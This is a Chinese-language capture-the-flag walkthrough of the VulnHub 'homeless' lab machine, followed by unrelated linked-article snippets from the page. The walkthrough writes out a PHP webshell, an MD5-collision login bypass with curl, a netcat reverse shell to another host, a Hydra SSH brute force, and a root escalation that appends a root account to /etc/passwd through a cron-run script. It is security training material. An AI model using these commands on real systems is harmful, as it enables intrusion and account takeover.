homeless靶机
仅供个人娱乐
靶机信息
下载地址:https://www.vulnhub.com/entry/homeless-1,215/
一、主机扫描
二、信息收集
在网页源码和页面上,我们发现User-Agent
三、漏洞利用
在agaent字段填上这个图片的字段 “Cyberdog Sledding Portal”
或使用字典:rockyou,来爆这个UA
打开该网页
上传小马
上传命令
<?=`ls`; #这句代码在php里等同于<?php echo `ls`;?>,是这段代码的缩写
注意这里一定是反引号,否则无法解析
访问相关文件
访问相关txt文件ip
信息收集
逻辑就是username、password、code两两不相等,但是三者的md5相等,要求post提交的3个参数不能两两相同,但是要求md5的值相同
百度信息收集
$ sudo apt-get install libboost-all-dev
cd python-md5-collision-master
python3 gen_coll_test.py
curl命令传输文件
选三个文件,直接用curl命令传输过去
curl传输的用法 https://ec.haxx.se/http/http-post
使用的参数:--data-urlencodeHTTP POST data url encoded
curl --data-urlencode username@out_test_000.txt --data-urlencode password@out_test_001.txt --data-urlencode code@out_test_002.txt http://192.168.56.128/d5fa314e8577e3a7b8534a014b4dcb221de823ad/ -i
获取到了一个SESSION eec1n77li90bsc5av8sp5k5q10
在浏览器中,F12,修改该Cookie值
访问
http://192.168.56.128/d5fa314e8577e3a7b8534a014b4dcb221de823ad/admin.php就进后台了
反弹
nc -e /bin/bash 192.168.56.129 4444
输入
python -c 'import pty; pty.spawn("/bin/bash")'
进行信息收集
从python文件入手
find / -type f -user downfall 2>/dev/null #除了用户目录多了个邮件但是没权限
find / -type f -group downfall 2>/dev/null #查找属于downfall组的文件
find / -type f -perm -u=s 2>dev/null 查看sudo文件
爆破ssh
hydra -l downfall -P /usr/share/wordlists/rockyou.txt -t 5 ssh://192.168.56.128
ssh downfall@192.168.56.128
secretlyinlove
进行信息收集
计划任务每分钟执行一次homeless.py脚本,及报错信息
第一种方式提权
vim /lib/logs/homeless.py
修改脚本
获取权限成功
第二种方式提权
直接用homeless写/etc/passwd文件
生成密码
perl -e 'print crypt("HUA123",q($6$hoiLHdTI)) ."\n"'
得到信息
$6$hoiLHdTI$1.6GQT97DN3dCD13qY1cEsHCTi6TywYNbLYYmu/DTHe2h6QLxdTXRnZ9lwqDwixsRSHZ685PoJq0/jrHG.XHx/
更改python文件内容为
vim /lib/logs/homeless.py
#! /usr/bin/python
f = open("/etc/passwd",'a')
f.write('xiao:$6$hoiLHdTI$1.6GQT97DN3dCD13qY1cEsHCTi6TywYNbLYYmu/DTHe2h6QLxdTXRnZ9lwqDwixsRSHZ685PoJq0/jrHG.XHx/:0:0::/root:/bin/bash')
f.close()
print "hello"
成功创建root权限账户
参考文章https://www.cnblogs.com/A1oe/p/12694954.html
homeless靶机的更多相关文章
- Vulnhub homeless靶机渗透
信息搜集 nmap -sP 192.168.146.6 nmap -A -Pn 192.168.146.151 直接访问web服务. 大概浏览一下没发现什么,直接扫描下目录把dirb+bp. BP具体 ...
- (28)A practical way to help the homeless find work and safety
https://www.ted.com/talks/richard_j_berry_a_practical_way_to_help_the_homeless_find_work_and_safety/ ...
- CTF线下防御战 — 让你的靶机变成“铜墙铁壁”
本文首发安全客,未经允许禁止转载.原文链接 一. 前言 随着CTF的普及,比赛的形式也有了越来越多的花样,对于线下赛来说,开始出现了安全加固或者防御战之类的环节,亦或者因为拿下靶机后不希望其他攻击者进 ...
- Ms17-010进行WEB提权之实践下某培训靶机服务器
前言:该机器为某个其他培训机构的靶机,说实话在这里没炫耀啥,只是给各位学习Ms17010的同学指一条路,我原先也折腾这玩意儿好久,但是就是不行,最近才找到了出路,所以多写两篇文章,把各种需要注意的地方 ...
- metasploit利用漏洞渗透攻击靶机
1.网络测试环境构建 首先需要先配置好一个渗透测试用的网络环境,包括如图1所示的运行Kali Linux系统的计算机,如图2所示的老师给的Windows Server 2000系统的计算机.这两台计算 ...
- web 攻击靶机解题过程
sql注入靶机攻击过程请参考 https://pentesterlab.com/exercises/from_sqli_to_shell/course http://www.sohu.com/a/12 ...
- Fowsniff: 1靶机入侵
一.信息收集 1.存活主机扫描 arp-scan -l 发现192.168.1.13是目标靶机的IP地址 2.端口扫描 接下来用nmap神器来扫描目标IP地址,命令如下: root@kali2018 ...
- digitalworld.local: MERCY靶机入侵
0x01 前言 MERCY是一个致力于PWK课程安全的靶机系统.MERCY是一款游戏名称,与易受攻击的靶机名称无关.本次实验是攻击目标靶机获取root权限并读系统目录中的proof.txt信息 靶机的 ...
- Moonraker:1靶机入侵
0x01 前言 攻击Moonraker系统并且找出存在最大的威胁漏洞,通过最大威胁漏洞攻击目标靶机系统并进行提权获取系统中root目录下的flag信息. Moonraker: 1镜像下载地址: h ...
随机推荐
- Linux关闭打开防火墙命令
Linux下打开和关闭防火墙 1.及时生效,重启后复原 关闭:service iptables stop 开启:service iptalbes start 查看状态:service iptabl ...
- JVM学习第一篇思考:一个Java代码是怎么运行起来的-上篇
JVM学习第一篇思考:一个Java代码是怎么运行起来的-上篇 作为一个使用Java语言开发的程序员,我们都知道,要想运行Java程序至少需要安装JRE(安装JDK也没问题).我们也知道我们Java程序 ...
- 四、JavaSE语言基础之运算符
什么是是运算符 运算符:用于数据运算的符号,运算是一种处理.(注:浮点型数据(float.double)进行运算会出现精度丢失的情况) 运算符大致可分为以下六种: 一.算术运算符:+.-.*./.%. ...
- 乘风破浪,Windows11设计和开发指导,全新图标字体和云母材质
Windows11全新的布局设计 Windows 11全新的布局设计已设计为支持现代应用体验.渐进的圆角.嵌套元素和一致的排水沟相结合,营造出柔和.平静.平易近人的效果,强调目的的统一和易用性. ht ...
- 关于Kubernetes(简称K8S)的开启及基本使用,基于Docker Desktop & WSL2
背景介绍 Kubernetes(简称k8s)已成为目前业界容器编排的事实标准,其搭配Docker可建立非常高效便捷的高可扩展.高可用应用服务架构. Kubernetes的名字来自希腊语,意思是&quo ...
- 解决CentOS下service 功能 不能使用 bash: service: command not found
首先检查自己是否 使用的是root用户 在centos系统中,如果/sbin目录下没有service这个命令,就会出现 bash: service: command not found 解决步骤如下: ...
- 20、checkconfig
chkconfig控制的原理(/etc/init.d/里面设置脚本,在/etc/rc.d/rc..d中设置软连接,通过chkconfig进行管理,同时也加入到了service服务,chkconfig设 ...
- 17、linux root用户密码找回
17.1.救援模式: 光盘模式启动(第一启动项) 删除/mnt/sysimage/etc/passwd root的密码,halt重启. 改为硬盘启动模式,无密码进入root,为root新建密码 17. ...
- 当VS和Flash builder同时运行时
1, 运行环境: windows 7, VS2010, Flash Builder 4.6 2, 在Flash Builder中运行工作空间和VS2010调试程序是同一个时,也就说在Flash ...
- BGV方案
BGV方案 SIMD技术 中国剩余定理 在<孙子算经>中有这样一个问题:"今有物不知其数,三三数之剩二(除以3余2),五五数之剩三(除以5余3),七七数之剩二(除以7余2),问物 ...